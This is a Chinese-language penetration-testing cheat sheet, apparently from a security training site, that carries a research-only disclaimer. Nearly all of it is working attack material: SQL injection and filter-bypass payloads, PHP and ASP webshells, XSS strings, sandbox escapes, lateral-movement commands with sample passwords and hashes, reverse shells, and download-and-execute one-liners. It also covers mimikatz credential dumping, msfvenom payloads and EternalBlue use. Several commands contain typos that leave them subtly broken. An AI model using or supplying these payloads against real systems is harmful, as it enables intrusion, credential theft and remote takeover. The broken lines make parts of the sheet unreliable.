本文章仅作技术研究,请勿用作非法途径!
Web
SQL Inject
联合查询爆显示位
union select 1,user(),3
联合查询爆表名
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
联合查询爆字段名
union select 1,2,group_concat(column_name) from information_schema.column where table_schema='users' --+
联合查询爆字段值
union select 1,username,password from `key` --+
万能密码
admin' or'1'='1'
布尔盲注测试
and length(database())=4 --+
时间盲注测试
or if(ascii(substr(database(),1,1))>0,sleep(1),1) --+
floor报错注入
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
extractvalue报错注入
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
into outfile写文件
select '<?php phpinfo();?>' into outfile '/var/www/html'
load_file 读文件
union select load_file('/etc/passwd')
access
and (select count(*) from msysobjects)>0 and 1=1
mssql
and (select count(*) from sysobjects)>0 and 1=1
oracle
and (select count(*) from sys.user_tables)>0 and 1=1
Bypass
大小写
uNIoN sELecT 1,2,3
空格绕过
/**/%55nION/**/%53ElecT/**/1,2,3Select(user())from test where id=1 and 1=1;
内联注释
/*!UNION*/+/*!SELECT*/+1,2,3/*UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM/*information_schema*/.tables /*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()---
双写绕过
UNIunionON+SELselectECT+1,2,3
编码绕过
- URLEncode编码:
or 1=1
即%6f%72%20%31%3d%31
- ASCII编码: Test:
CHAR(84)+CHAR(101)+CHAR(115)+CHAR(116)
- 十六进制编码:
SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
PHP伪协议
php伪协议,以base64编码输出
php://filter/read=convert.base64-encode/resource=index.php
php伪协议,以base64编码写入
php://filter/write=convert.base64-decode/resource=xx.php
data协议命令执行
data:text/plain,<?php system('whoami');?>
一句话木马
php
<?php eval($_POST['pwd']);?>
asp
<%execute(request('pwd'))%>
aspx
<% @Page Language='jscript'%><%eval(Request.Item['pwd'],'unsafe');%>
生成图片马
copy 1.jpg /b + 1.php /b shell.php
XSS Payload
<img src=1 onerror=alert(/xss/)>
<script>alert(/xss/)</script>
<script>prompt(/xss/)</script>
<script>alert(document.cookie)</script
' onmouseover='alert(/xss/)
" onclick="alert(/xss/)
javascript:alert(/xss/)
<body onload=alert(/xss/)>
<body background="javascript:alert(/xss/)">
Python沙箱逃逸
python2沙箱逃逸
"".__class__.__mro__[-1].__subclasses__()[71].__init__.globales__['os'].system('ls')
python3沙箱逃逸
"".__class__.__mro__[-1].__subclasses__()[117].init__.globales['system']('ls')
PHP命令执行
<?php $cmd=$_POST['cmd'];@exec($cmd,$return);var_dump($return);?>
<?php $last_line = system("ls",$retval);echo $last_line;?>
<?php $output = passthru("ls -la");echo "<pre>$output</pre>";?>
<?php $output = shell_exec('ls -la');echo "<pre>$output</pre>";?>
<?php $fd = popen("whoami", 'r');$ret = fgets($fd);print($ret);?>
<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c".$command);
$stdout = $exec->StdOut();
$stdoutput = $stdout->ReadAll();
echo $stdoutput
?>
PHP代码执行
<?php @eval($_POST['cmd']);?>
<?php @assert($_POST['cmd']);?>
<?php echo "{${phpinfo()}}";?>
<?php call_user_func("assert",$_POST['cmd']);?>
<?php preg_replace("/test/e",$_POST['cmd'],"just test");?>
<?php $func = create_function('',$_POST['cmd']);$func;?>
<?php $cmd=$_POST['cmd'];$array[0]=$cmd;call_user_array("assert",$array);?>
<?php $cmd=$_POST['cmd'];$array1=array($cmd);$func=$_GET['func'];array_filter($array1,$func);?>
<?php $func=$_GET['func'];$cmd=$_POST['cmd'];$ayyar[0]=$cmd;$new_array=array_map($func,$array);echo $new_array;?>
横向渗透
WMIC
wmic /node:10.10.10.201 /user:administrator /password:hetianlab.com process call create "cmd.exe /c ipconfig"
IPC + Schtasks
net use \\10.10.10.201\c$ /user:administrator "hetianlab.com"
copy c:\windows\temp\59.exe \\10.10.10.201\c$
schtasks /create /s 10.10.10.201 /u de1ay\administrator /p "hetianlab.com" /sc MINUTE /mo 1 /tn test2 /tr "c:\59.exe"
schtasks /run /s 10.10.10.201 /u de1ay\administrator /p "hetianlab.com" /tn test2
schtasks /delete /tn At1 /s 10.10.10.201 /u administrator /p hetianlab.com
IPC + AT
net use \\10.10.10.201\c$ /user:administrator "hetianlab.com"
copy 59.exe \\10.10.10.201\c$
at \\10.10.10.201 19:08 c:\59.exe
Smbexec
smbexec.exe heetian\Administrator:hetianlab.com@10.10.10.201
Psexec
PsExec.exe \\192.168.10.201 -h heetian\Administrator -p hetianlab.com -s cmd.exe -accepteula
PTH
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:10.10.10.201 /ntlm:579110c49145015c47ecd267657d3174" exit
wmiexec.exe -hashes aad3b435b51404eeaaad3b435b51404ee:579110c49145015c47ecd267657d3174 administrator@10.10.10.201 "whoami"
smbexec.exe -hashes aad3b435b51404eeaaad3b435b51404ee:579110c49145015c47ecd267657d3174 administrator@10.10.10.201
Wmiexec
wmiexec.exe -share admin$ administrator:hetianlab.exe@10.10.10.201
渗透测试
反弹shell
Bash
bash -i >& /dev/tcp/192.168.1.1/3344 0>&1
0<&196;exec 196<>/dev/tcp/192.168.1.1/3344; bash <&196 >&196 2>&196
NC
nc -e /bin/bash 192.168.1.1 3344
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.1.1 3344 > /tmp/f
PHP
php -r '$sock=fsockopen("192.168.1.1",3344);exec("/bin/bash -i <&3 >&3 2>&3");'
Telnet
telnet 192.168.1.1 8080 | /bin/bash | telnet 192.168.1.1 9090
crontab
* * * * * /bin/bash -i >& /dev/tcp/192.168.1.1/1234 0>&1
Socat
socat TCP:192.168.1.1:3344 EXEC:bash
socat TCP:192.168.1.1:3344 EXEC:"bash -li",pty,stderr,setsid,sigint,sane
获得伪终端
python -c 'import pty;pty.spawm("/bin/bash")'
信息收集
dig @223.5.5.5 hetianlab.com -t A
nslookup hetianlab.com 223.5.5.5
nmap -sn -Pn hetianlab.com --script hostmap-crtsh
whois hetianlab.com
site:hetianlab.com web
inurl:login
intext:蚁景网安学院
intitle:后台登录
filetype:xls 身份证
文件传输
bitsadmin下载文件
bitsadmin /transfer lan http://192.168.1.2/1.hta C:\temp\1.hta
certutil下载文件并执行
certutil.exe -urlcache -split -f http://192.168.1.2/shell.exe shell.exe & shell.exe
certutil清除缓存
certutil.exe -urlcache -split -f http://192.168.1.2/shell.exe delete
powershell下载文件
powershell -c "$p=new-object system.net.webclient;$p.DownloadFile('http://192.168.1.2/1.hta','1.hta')"
powershell.exe (new-object system.net.webclient).downloadfile('http://192.168.1.2/1.hta','1.hta')
powershell Invoke-WebRequest -uri "http://192.168.1.2/1.hta" -OutFile "$env:temp\1.hta"
wget
wget http://192.168.1.2/1.sh
wget -O x.sh http://192.168.1.2/1.sh
curl
curl -o x.hta http://192.168.1.2/1.sh
curl -O http://192.168.1.2/1.sh
PHP
php -r 'file_put_contents("lan.hta",file_get_contents("http://192.168.1.2/1.sh"));'
Python
python2 -c "import urllib2;u=urllib2.urlopen('http://192.168.1.2/1.hta');f=open('c:\\temp\\win.hta','w');f.write(u.read());f.close"
python3 -c "import urllib.request;u=urllib.request.urlopen('http://192.168.1.2/1.hta');f=open('c:\\temp\\win.hta','w');f.write(u.read().decode('utf-8'))"
Ruby
ruby -e 'require "net/http";Net::HTTP.start("192.168.1.227") { [http]r=http.get("/1.sh");open("/root/x.sh","wb") {[file]file.write(r.body)}}'
Perl
perl -MLWP::Simple -e 'getstore ("http://192.168.1.2/1.sh", "1.sh")'
Powershell加载远程脚本
powershell -nop -w hidden -exec bypass -c "IEX (New-Object New.WebClient).DownloadString('http://192.168.1.2/shell.ps1');shell.ps1";
工具
Mimikatz
启动mimikatz
mimikatz.exe
# privilege::debug
# log c:\temp\mimikatz.log
获取登录账号的明文密码和Hash值
# sekurlsa::logonpasswords
备份注册表中的SYSTEM & SAM hive
C:\> reg save HKLM\SYSTEM system.hiv
C:\> reg save HKLM\SAM sam.hiv
mimikatz获取hashes
# lsadump::sam /system:system.hiv /sam:sam.hiv
读取从lsass进程中保存文件里的明文密码
# sekurlsa::minidump lsass.dump
NMAP
基础扫描
nmap -A -T4 192.168.1.1
存活主机探测
nmap -sP 192.168.1.1/24
全端口扫描
nmap -sS -v -T4 -Pm -p- 192.168.1.1
系统扫描
nmap -O -T4 -Pn -oG OSDetect 192.168.1.1
服务版本检测
nmap -sV -T4 -Pn -oG ServiceDetect 192.168.1.1
waf识别
nmap -p80,443 --script http-waf-detect 192.168.1.1
nmap -p80,443 --script http-waf-fingerprint 192.168.1.1
Msfvenom
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o /tmp/shell.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f elf > shell.elf
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f macho > shell.macho
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<Port> -f raw > shell.sh
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.php
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f war > shell.war
Python
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<Port> -f raw > shell.py
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<Port> -f raw > shell.pl
PowerShell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f psh > shell.ps1
Metasploit
msfconsole
msf > search eternalblue
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(...) > set RHOSTS 192.168.1.1
msf exploit(...) > exploit